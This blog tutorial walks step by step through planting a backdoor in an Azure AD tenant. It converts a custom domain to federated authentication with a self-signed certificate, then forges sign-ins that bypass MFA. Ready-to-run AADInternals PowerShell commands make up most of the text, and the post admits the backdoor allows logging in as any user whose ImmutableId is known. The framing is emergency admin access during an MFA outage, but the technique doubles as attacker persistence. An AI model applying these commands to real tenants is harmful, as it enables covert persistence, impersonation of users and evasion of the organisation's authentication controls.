This Monday Azure AD MFA was down over 12 hours preventing users from logging in to Office 365. As MFA is usually mandatory for administrators by company policy, they couldn’t log in either. In this blog, I’ll show how to create a backdoor to Azure AD so you can log in and bypass MFA.
Microsoft has pushed organisations to use Azure AD Multi-Factor Authentication (MFA) to increase the security of their cloud offering. This Monday the MFA service was down worldwide for over 12 hours.
How can admins log in if something similar happens? The answer is: using a backdoor. Here is how to create one.
Note! In this blog, I’m using the AADInternals PowerShell module.
The backdoor utilises a known identity federation
vulnerability feature I blogged a year ago. To create a backdoor, you need:
- An admin user
- A custom domain
- A x509 certificate
- Identity Provider
An admin user
Naturally, the first needed thing is an administrator account. The backdoor requires that the account has an ImmutableID attribute set. If the account is synced from on-premises, the attribute contains a base64 encoded GUID of user’s on-prem AD object. If the account is not synced you need to set it manually. The value can be basically any string, as long as it is unique within the tenant.
To set the ImmutableId, use the following commands
# Get AccessToken Get-AADIntAccessTokenForAADGraph # Set the ImmutableId Set-AADIntUser -UserPrincipalName "firstname.lastname@example.org" -ImmutableId "AADBackdoor"
A custom domain
Next, you need a custom domain which can be converted to Federated. You can get one free from www.myo365.site
The next needed part is a certificate. In Windows 10, you can easily create a self-signed certificate with PowerShell. If you are running older OS, you can use MakeCert.exe or OpenSSL to create the certificate.
You can also create a certificate online, but these are created by a third party and should NEVER be used in production.
Create a certificate with following PowerShell commands:
# Create a new self-signed certificate and add it to your personal store $cert = New-SelfSignedCertificate -DnsName "backdoor.company.com" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter (Get-Date).AddYears(100) # Save the password to a variable $certPwd = ConvertTo-SecureString -String "password" -Force -AsPlainText # Export the certificate to .pfx file Export-PfxCertificate -Cert $cert -FilePath "c:\mycert.pfx" -Password $certPwd # Remove the certificate from the personal store Remove-Item "cert:\CurrentUser\my\$($cert.Thumbprint)"
The last needed thing is an identity provider. In this blog, I use AADInternals PowerShell module, but any IdP supporting WS-FED protocol can be used, such as ADFS.
Create the backdoor
To create the backdoor, you need to set the authentication parameters of the chosen domain to match the IdP. For this, you need an Azure-wide unique issuer and the public key of the certificate.
# Extract the public key $publicKey = [Convert]::ToBase64String($cert.Export("cert")) # Set the issuer and login / logoff uri $uri="http://backdoor.company.com/" # Set the domain authentication info Set-AADIntDomainAuthentication -DomainName "backdoor.company.com" -Authentication Federated -IssuerUri $uri -PassiveLogOnUri $uri -LogOffUri $uri -SigningCertificate $publicKey
And that’s it, the backdoor is created and you’re ready to open it!
# Load the certificate from .pfx file $signingCert=Get-AADIntCertificate -FileName "c:\mycert.pfx" -Password "password" # Create a html page and open it in a Internet Explorer InPrivate -session Open-AADIntOffice365Portal -ImmutableId "AADBackdoor" -Issuer "http://backdoor.company.com" -Certificate $signingCert -ByPassMFA $true
You should now see the html page as below. Click the Login to Office 365 button to log in! You can also view the source code of the page to see what the SAML token contains.
Now you have a backdoor which you can use to access Office 365 - even if the MFA service is down. Conditional access may still block the access for other reasons.
Note! The backdoor allows you to log in as ANY USER of the tenant, as long as the user’s ImmutableId is known. So keep the certificate protected and safe!